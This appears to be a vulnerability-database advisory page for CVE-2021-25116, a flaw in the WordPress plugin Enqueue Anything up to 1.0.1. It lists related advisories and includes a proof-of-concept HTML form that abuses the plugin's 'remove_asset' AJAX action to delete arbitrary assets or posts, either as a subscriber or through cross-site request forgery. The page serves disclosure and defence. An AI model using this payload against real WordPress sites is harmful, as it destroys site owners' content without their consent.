Lucene search
Enqueue Anything <= 1.0.1 - Subscriber+ Arbitrary Asset/Post Deletion
Enqueue Anything <= 1.0.1 - Subscriber+ Arbitrary Asset/Post Deletion via CSR
Show more
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | WordPress Enqueue Anything pluginθ·¨η«θ―·ζ±δΌͺι ζΌζ΄ | 15 Jun 202200:00 | β | cnvd |
 | WordPress Enqueue Anything plugin <= 1.0.1 - Arbitrary Asset/Post Deletion vulnerability | 17 May 202200:00 | β | patchstack |
 | CVE-2021-25116 | 13 Jun 202213:15 | β | cve |
 | CVE-2021-25116 Enqueue Anything <= 1.0.1 - Subscriber+ Arbitrary Asset/Post Deletion | 13 Jun 202212:41 | β | cvelist |
 | Cross site request forgery (csrf) | 13 Jun 202213:15 | β | prion |
 | CVE-2021-25116 | 13 Jun 202213:15 | β | nvd |
 | Enqueue Anything <= 1.0.1 - Subscriber+ Arbitrary Asset/Post Deletion | 17 May 202200:00 | β | wpvulndb |
As a subscriber, or via CSRF against any authenticated user
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="remove_asset" />
<input type="hidden" name="id" value="289" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo17 May 2022 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.001